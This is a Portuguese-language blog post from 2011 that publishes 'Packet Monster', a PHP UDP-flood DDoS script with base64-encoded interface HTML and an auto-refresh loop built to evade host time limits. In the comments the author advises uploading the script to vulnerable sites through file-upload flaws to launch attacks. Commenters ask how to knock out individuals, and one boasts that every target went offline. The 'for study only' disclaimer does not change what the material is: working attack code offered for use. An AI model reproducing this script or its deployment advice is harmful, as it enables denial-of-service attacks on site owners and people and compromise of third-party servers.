Packet Monster – Ferramenta para DDoS

abril 12, 2011   Samukt   43 Comments
ddos_samukt

Venho postar minha nova ferramenta para DDoS.
Espero que gostem…
Porque ela é tão especial? Pois o sistema de looping é diferente, alem de não ser um bot…
A maioiria dos servidores bloqueia o script depois de um tempo, com esse ele vai apenas dar f5 e continuar até você fechar a aba.

Como usar? Salve como .php e mande para algum servidor e apenas abra-o, o resto é auto-explicativo.

Posso modificar o script? Claro, é 100% Open-Source, porem peço que poste créditos.

Video-Aula:

Script:

       <?php

    //=================================================
    // |          Packet Mosnter // By Samukt         |
    // |             www.inw-seguranca.com            |
    //=================================================

    $packets = 0;
    set_time_limit(0);
    ignore_user_abort(FALSE);
    if ($_GET["ip"]==""){
    ?>
    <?php
    $codado = 'PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHksdGQsdGggew0KCWNvbG9yOiAjRjAwOw0KfQ0KYm9keSB7DQoJYmFja2dyb3VuZC1jb2xvcjogIzAwMDsNCgliYWNrZ3JvdW5kLWltYWdlOiB1cmwoaHR0cDovL3d3dy5pbWFnZW5zZ3JhdGlzLmNvbS5ici9pbWFnZW5zL29yaWdpbmFsL2ltYWdlbnMtZGEtYmFuZGVpcmEtZG8tYnJhc2lsLmpwZyk7DQoJYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCn0NCi50ZXh0IHsNCgljb2xvcjogI0ZGRjsNCn0NCi5kaXYgew0KCXRleHQtYWxpZ246IGNlbnRlcjsNCgloZWlnaHQ6IDYwMHB4Ow0KCXdpZHRoOiA1MDBweDsNCgltYXJnaW4tcmlnaHQ6IGF1dG87DQoJbWFyZ2luLWxlZnQ6IGF1dG87DQoJYm9yZGVyOiAxcHggc29saWQgI0ZGRjsNCgktbW96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQoJLXdlYmtpdC1ib3JkZXItcmFkaXVzOiAxMHB4Ow0KCWJhY2tncm91bmQtY29sb3I6ICMwMDA7DQoJZmlsdGVyOmFscGhhKG9wYWNpdHk9NzApOw0KCS1tb3otb3BhY2l0eTowLjc7DQoJLWtodG1sLW9wYWNpdHk6IDAuNzsNCglvcGFjaXR5OiAwLjc7DQoJYmFja2dyb3VuZC1yZXBlYXQ6IHJlcGVhdDsNCn0NCmE6bGluayB7DQoJY29sb3I6ICNGMDA7DQp9DQphOnZpc2l0ZWQgew0KCWNvbG9yOiAjRjAwOw0KfQ0KYTpob3ZlciB7DQoJY29sb3I6ICNGMDA7DQp9DQphOmFjdGl2ZSB7DQoJY29sb3I6ICNGMDA7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KDQo8Ym9keSB0ZXh0PSIjRkYwMDAwIj4NCjxjZW50ZXI+DQo8ZGl2IGNsYXNzPSJkaXYiPg0KPGltZyBzcmM9Imh0dHA6Ly9pNTYudGlueXBpYy5jb20vcW4wa2syLnBuZyIgLz48YnIvPg0KPGgxPlA8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YWM8L2ZvbnQ+azxmb250IGNvbG9yPSIjRkZGRkZGIj5ldDwvZm9udD4gTTxmb250IGNvbG9yPSIjRkZGRkZGIj5vbjwvZm9udD5zPGZvbnQgY29sb3I9IiNGRkZGRkYiPnRlPC9mb250PnIgPGZvbnQgY29sb3I9IiNGRkZGRkYiPkJ5PC9mb250PiBTPGZvbnQgY29sb3I9IiNGRkZGRkYiPmFtPC9mb250PnU8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+a3Q8L2ZvbnQ+PC9oMT4gDQo8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+U2V1IElQIMOpOjwvZm9udD4g';
    echo base64_decode($codado);
    ?><?php echo getenv('REMOTE_ADDR'); ?><hr />
    <?php
    $codado2 = 'PGZvcm0gaWQ9ImZvcm0xIiBuYW1lPSJmb3JtMSIgbWV0aG9kPSJnZXQiIGFjdGlvbj0iP2FjdD1wb3N0ZWQiPg0KICA8cD48c3BhbiBjbGFzcz0idGV4dCI+SVAgPC9zcGFuPkFsdm86DQogIDxpbnB1dCBuYW1lPSJpcCIgdHlwZT0idGV4dCIgaWQ9ImlwIiB2YWx1ZT0iMTI3LjAuMC4xIiAvPjxici8+ICANCiAgPHNwYW4gY2xhc3M9InRleHQiPlRlbTwvc3Bhbj5wbzoNCiAgPGlucHV0IG5hbWU9InRpbWUiIHR5cGU9InRleHQiIGlkPSJ0aW1lIiB2YWx1ZT0iVGVtcG8gKGVtIFNlZ3VuZG9zKSIgLz4NCiAgICBQb3J0YTogPGlucHV0IG5hbWU9InBvcnQiIHR5cGU9InRleHQiIGlkPSJwb3J0IiB2YWx1ZT0iUG9ydGEiIC8+DQogICA8YnIvPiA8aW5wdXQgdHlwZT0icmFkaW8iIG5hbWU9ImxvcHAiIGlkPSJsb3BwIiB2YWx1ZT0ic2ltIiAvPiANCiAgICA8bGFiZWwgZm9yPSJsb3BwIj4gTG9vcCBBdXRvbWF0aWNvPC9sYWJlbD4NCiAgICA8YnIvPg0KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImJ1dHRvbiIgaWQ9ImJ1dHRvbiIgdmFsdWU9IkF0YWNhYWFycnJycnIhISEiIC8+DQo8L3A+DQo8L2Zvcm0+PGhyIC8+DQo8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+SW5mb3JtYcOnw6NvZXM6PGJyIC8+PC9mb250Pg0KQ29kYWRvIHBvciBTYW11a3QgLSA8YSBocmVmPSJodHRwOi8vd3d3Lmludy1zZWd1cmFuY2EuY29tIj5odHRwOi8vd3d3Lmludy1zZWd1cmFuY2EuY29tPC9hPjxici8+DQo8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PHN0cm9uZz5Fc3TDoSBmZXJyYW1lbnRhIMOpIGFwZW5hcyBwYXJhIGFwcmVuZGl6YWRvLCA8YnIvPk7Do28gbWUgcmVzcG9uc2FiaWxpem8gcG9yIHNldSBtYXUgdXNvLjwvZm9udD48L3N0cm9uZz4NCg0KPC9kaXY+DQo8L2JvZHk+DQo8L2h0bWw+';
    echo base64_decode($codado2);
    ?>
    <?php
    }else{
       $ip = $_GET["ip"];
    $rand = $_GET["port"];
    $exec_time = $_GET["time"];
    $lopp = $_GET["lopp"];

    $time = time();
    $max_time = $time+$exec_time;

    for($i=0;$i<65535;$i++){
            $out .= "SamuktDDoSTOOL";
    }
    while(1){
    $packets++;
            if(time() > $max_time){
                    break;
            }

            $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                    fclose($fp);
            }
    }
    ?>
    <?php
    $codado3 = 'PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5QYWNrZXQgTW9uc3RlciBCeSBTYW11a3Q8L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHksdGQsdGggew0KCWNvbG9yOiAjRjAwOw0KfQ0KYm9keSB7DQoJYmFja2dyb3VuZC1jb2xvcjogIzAwMDsNCgliYWNrZ3JvdW5kLWltYWdlOiB1cmwoaHR0cDovL3d3dy5pbWFnZW5zZ3JhdGlzLmNvbS5ici9pbWFnZW5zL29yaWdpbmFsL2ltYWdlbnMtZGEtYmFuZGVpcmEtZG8tYnJhc2lsLmpwZyk7DQoJYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCn0NCi50ZXh0IHsNCgljb2xvcjogI0ZGRjsNCn0NCi5kaXYgew0KCXRleHQtYWxpZ246IGNlbnRlcjsNCgloZWlnaHQ6IDYwMHB4Ow0KCXdpZHRoOiA1MDBweDsNCgltYXJnaW4tcmlnaHQ6IGF1dG87DQoJbWFyZ2luLWxlZnQ6IGF1dG87DQoJYm9yZGVyOiAxcHggc29saWQgI0ZGRjsNCgktbW96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQoJLXdlYmtpdC1ib3JkZXItcmFkaXVzOiAxMHB4Ow0KCWJhY2tncm91bmQtY29sb3I6ICMwMDA7DQoJZmlsdGVyOmFscGhhKG9wYWNpdHk9NzApOw0KCS1tb3otb3BhY2l0eTowLjc7DQoJLWtodG1sLW9wYWNpdHk6IDAuNzsNCglvcGFjaXR5OiAwLjc7DQoJYmFja2dyb3VuZC1yZXBlYXQ6IHJlcGVhdDsNCn0NCmE6bGluayB7DQoJY29sb3I6ICNGMDA7DQp9DQphOnZpc2l0ZWQgew0KCWNvbG9yOiAjRjAwOw0KfQ0KYTpob3ZlciB7DQoJY29sb3I6ICNGMDA7DQp9DQphOmFjdGl2ZSB7DQoJY29sb3I6ICNGMDA7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KDQo8Ym9keSB0ZXh0PSIjRkYwMDAwIj4NCjxjZW50ZXI+DQo8ZGl2IGNsYXNzPSJkaXYiPg0KPGltZyBzcmM9Imh0dHA6Ly9pNTYudGlueXBpYy5jb20vcW4wa2syLnBuZyIgLz48YnIvPg0KPGgxPlA8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YWM8L2ZvbnQ+azxmb250IGNvbG9yPSIjRkZGRkZGIj5ldDwvZm9udD4gTTxmb250IGNvbG9yPSIjRkZGRkZGIj5vbjwvZm9udD5zPGZvbnQgY29sb3I9IiNGRkZGRkYiPnRlPC9mb250PnIgPGZvbnQgY29sb3I9IiNGRkZGRkYiPkJ5PC9mb250PiBTPGZvbnQgY29sb3I9IiNGRkZGRkYiPmFtPC9mb250PnU8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+a3Q8L2ZvbnQ+PC9oMT4gDQo8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+U2V1IElQIMOpOjwvZm9udD4g';
    echo base64_decode($codado3);
    ?><?php echo getenv('REMOTE_ADDR'); ?><hr />
    <?php print "<h2>Atacando: $ip na porta $rand </h2>";?>
    <?php
    echo "Packet completo em ".time('h:i:s')." com $packets (" . round(($packets*65)/1024, 2) . " mB) pacotes. ". round($packets/$exec_time, 2) . " pacotes/s \n";
    if ($lopp=='sim'){
    echo 'Começando Denovo...<meta http-equiv="refresh" content="0;url=?ip='.$ip.'&time='.$exec_time.'&port='.$rand.'&lopp=sim&button=Atacaaarrrrrr!!!" />';
    }
    ?>
    <?php
    $codado4 = 'PGhyIC8+DQo8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+SW5mb3JtYcOnw6NvZXM6PGJyIC8+PC9mb250Pg0KQ29kYWRvIHBvciBTYW11a3QgLSA8YSBocmVmPSJodHRwOi8vd3d3Lmludy1zZWd1cmFuY2EuY29tIj5odHRwOi8vd3d3Lmludy1zZWd1cmFuY2EuY29tPC9hPjxici8+DQo8Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PHN0cm9uZz5Fc3TDoSBmZXJyYW1lbnRhIMOpIGFwZW5hcyBwYXJhIGFwcmVuZGl6YWRvLCA8YnIvPk7Do28gbWUgcmVzcG9uc2FiaWxpem8gcG9yIHNldSBtYXUgdXNvLjwvZm9udD48L3N0cm9uZz4NCg0KPC9kaXY+DQo8L2JvZHk+DQo8L2h0bWw+';
    echo base64_decode($codado4);
    ?>
    <?php
    }
    ?>

PS:
Código editado: Versão 1.5 adicionada, agora ele está mais “nocivo”.

Lembrando, ela é para estudos, não me responsabilizo pelo seu mau uso.

Posted in: Hacking, Pen-Test, Php, Programas   Tags: , , , ,

43 Responses to Packet Monster – Ferramenta para DDoS

  1. dede disse:
    abril 14, 2011 às 12:33 am
    muitos sevidores tem firewall que da ban no ip
  2. Samukt disse:
    abril 14, 2011 às 4:51 pm
    É acontece isso em alguns servidores.
    Mas dai os crackers apenas trocam a shell, entende?
  3. dede disse:
    abril 15, 2011 às 3:42 pm
    sim
  4. @jNoTheBest disse:
    abril 17, 2011 às 5:44 am
    Queria saber como eu faço para colocar o php em um outro site que pretendo atacar?. Não entendi essa parte do localhost.
    Por exemplo: http://www.olhonoclick.com
  5. Samukt disse:
    abril 18, 2011 às 8:15 pm
    Você deve ter permissões e fazer upload do arquivo.
    Depois vá no site ex:
    http://www.site.com/ddos.php
  6. @jNoTheBest disse:
    abril 19, 2011 às 4:07 pm
    Quals permissões são essas?. Desculpe sou novato, mais gosto do seu trabalho.
  7. Samukt disse:
    abril 19, 2011 às 7:16 pm
    Apenas você tem que fazer upload no servidor…
  8. Tavinho disse:
    maio 1, 2011 às 11:55 pm
    e como faz upload no servidor ?
  9. Tavinho disse:
    maio 1, 2011 às 11:59 pm
    cara não entendi onde que eu salvo e colo isso , desculpe mas tmb sou novato :\
  10. Samukt disse:
    maio 2, 2011 às 7:47 pm
    Cole no bloco de notas e salve como algum nome.php
    Mande para um servidor, seja por falha ou algo do gênero.
  11. Tavinho disse:
    maio 3, 2011 às 12:34 am
    Já fiz isso amigo , salvei como .php , e quando clico abre o bloco de notas com o script e a mesma coisa que eu salvar como .txt (uso windows xp)
    ja tentei “nome_do_arquivo.php” mesmo assim não vai.
  12. douglas disse:
    maio 5, 2011 às 6:07 pm
    é parar mandar o arquivo pelo site (ex:mensagens) e depois coloca o programa para funcionar?
  13. Tavinho disse:
    maio 7, 2011 às 12:01 am
    aah explica isso direito ne , eu ja tentei salvar .php no bloco de notas e não vai !
  14. corporation disse:
    maio 7, 2011 às 12:56 pm
    não entendi mto bem, como enviar o packet monster para o site
    explica ai, por favor samukt
  15. Samukt disse:
    maio 8, 2011 às 7:34 pm
    amigos vocês devem achar um site vulneravel, que de para fazer upload.
    Como fazer upload de fotos no orkut, vocês fazer upload do arquivo.
    depois entram nele pelo site, ex: http://www.site.com/uploads/ddos.php
  16. Tavinho disse:
    maio 8, 2011 às 9:33 pm
    como saber se o site é vuneravel ? vc sabe algum site vuneravel ?
  17. Samukt disse:
    maio 10, 2011 às 1:14 pm
    Tavinho para saber se o site está vulneravel você deve visualizar os outros tópicos do site e dar uma estudada…
    Porque você não posta suas dúvidas no Forum?
  18. corporation disse:
    maio 11, 2011 às 5:22 pm
    samukt fiz td certo, só deu uma coisa errada, foi o servidor, me ensina ai por favor
    como achar um server e coloca-lo no site, pq essa coisa de servirdor eu me complico
  19. Tavinho disse:
    maio 11, 2011 às 7:25 pm
    o forum não abre aqui … só fica uma janela branca \:
  20. Rafael disse:
    maio 11, 2011 às 10:57 pm
    Preciso de ajuda sua cara, tem como adicionar meu msn e me ajudar? rafael.under@hotmail.com
    vlw abraços
  21. Danilo Ribeiro disse:
    junho 17, 2011 às 4:33 pm
    Eu não entendi a parte do Localhost, aonde eu coloco o ddos.php ? como coloco ele em um servidor ? como crio o localhost que você tinha?
  22. Dandré disse:
    junho 24, 2011 às 10:00 pm
    Mano, quanta pergunta nob…

    prestem atenção, o ataque ddos nada mais é que um grande numero de acesso a uma determinada pagina, fazendo com que o trafego dela aumente e saia fora do ar.

    outra coisa nob é não conseguirem salvar como php.
    basta colar no bloco de notas o codigo e na hora de salvar colocar em salvar como, nomequequiser.php e em salvar como tipo selecione todos, e pronto tera seu arquivo em php

    sobre co localhost foi um exemplo que ele deu com um servidor dele, pra esse sistema funcionar vc precisa ter acesso ao servidor da pessoa, da vitima, que issi é o mais dificil, existem sites que possibilitam o envio de arquivos direto para o servidores deles, como fotos e etc….. use esses sites para enviar seu php

    um ataque DDos nao é tao simples assim como parece ser, pra quem realmente deseja aprender procure se informar melhor como funciona um DDos antes de fazer perguntas toscas…e ai vai outra questão… praque tirar um site do ar, por pura diversão ?? acho que isso deve ser feito apenas em casos extremos… tb acho que quase ninguem vai ler oque eu escrevi, pq muita gente tem preguiça de ler e ja quer tudo de mao beijada…

  23. Samukt disse:
    junho 26, 2011 às 6:13 pm
    Dandré Mandou bem amigo.
    Explicou direitinho :)
    É uma pena que nossa cultura seja “Ler? pra quê?”
  24. cherlon disse:
    junho 26, 2011 às 8:42 pm
    ok fiz aqui isso ae é pra derrubar o site ou oq?
    aqui n fez nada
  25. RadiactiveMan disse:
    julho 2, 2011 às 8:57 pm
    Olá! Porque é usado protocolo UDP e não um outro qualquer?
  26. h3x0r disse:
    julho 3, 2011 às 4:54 pm
    Tenso, NOOBS DETECTED!
  27. henrique disse:
    julho 4, 2011 às 7:02 pm
    n tem como passar alguns sites vulneraveis ?
  28. Avagliano disse:
    julho 5, 2011 às 12:23 pm
    Putisssss grila… quanta besteira!!!! Esses ataques de DDoS não funcionam mais… a maioria dos servidores contam com ajuda do firewal…
  29. massa disse:
    julho 10, 2011 às 5:42 am
    massa
  30. Samukt disse:
    julho 12, 2011 às 5:27 pm
    Avagliano,
    Como você acha que derrubaram a PSN?
    DDoS é um dos ataques mais utilizados hoje em dia…
    Basta olhar ao redor.
  31. Cassiano disse:
    outubro 18, 2011 às 4:02 pm
    Exelente … realmente funciona ….
    muito bom pra nukar
    aprovadissimo.

    hospedei ele em alguns sites q suportam php …
    ficou um luxo …
    todas as vitimas q testei .. 100% de aproveitamento … todas down.

  32. Samukt disse:
    outubro 19, 2011 às 8:35 pm
    Olá Cassiano,
    Obrigado pelos elogios e por usar a ferramenta.
    Continue acompanhando o site ;)

    @all
    Lembrando, ela é para estudos, não me responsabilizo pelo seu mau uso.

  33. sim+ disse:
    outubro 29, 2011 às 4:51 pm
    tem um erro na linha 11
    if ($_GET["ip"]==”"){

    qual cripitografia vc usou no seu codigo na linha 14,18,48,59

  34. Nicholas disse:
    novembro 4, 2011 às 3:10 pm
    Por Favor passe-me um host free que aceite o uso do script, pois os que testei ele bloqueia a ação do script.
    Obrigado
  35. Samukt disse:
    novembro 8, 2011 às 3:57 pm
    @nicholas,
    Amigo tem o freetzi.com mas não sei se ele bloqueia ou não.
  36. Banaipe disse:
    novembro 18, 2011 às 3:52 pm
    por favor dos que conseguiram sucesso que host free é que funciona?
  37. Jamil disse:
    novembro 25, 2011 às 9:17 am
    Samukt, eu preciso da sua ajuda urgentemente! se puder me mandar um e-mail com o seu msn, preciso falar com vc cara..mt mesmo, n qro derrubar sites, soh 1 pessoa…e eu preciso soh de 1 explicaçao pra isso, eu posso te gratificar..obrigado..email: jamilsantos1@gmail.com
  38. Jamil disse:
    novembro 25, 2011 às 9:36 am
    Checking files:
    File ddos.php is OK
    Transferring files to the FTP server:
    File ddos.php could not be transferred to the FTP server

    o site bloqueia né? :(

  39. Roberto disse:
    novembro 25, 2011 às 11:32 am
    pra nukar uma pessoa comum ql porta coloca?
  40. Samukt disse:
    novembro 25, 2011 às 9:57 pm
    @Jamil
    Amigo me mande suas dúvidas por email: samukt@inw-seguranca.com, terei prazer em tentar ajuda-lo.

    @Roberto
    Coloque a porta que está aberta, normalmente 80.

  41. BrazilObscure disse:
    janeiro 8, 2012 às 8:36 am
    Boa mas tenho varias shell ddos tambem :D @BrazilObscure
  42. Matheus disse:
    fevereiro 1, 2012 às 8:54 pm
    O Packet Monster, está offline, não funciona mais :(
  43. Matheus disse:
    fevereiro 2, 2012 às 7:18 pm
    Quando o packet Monster iraá voltar? :o

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

*

Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

  • Publicidade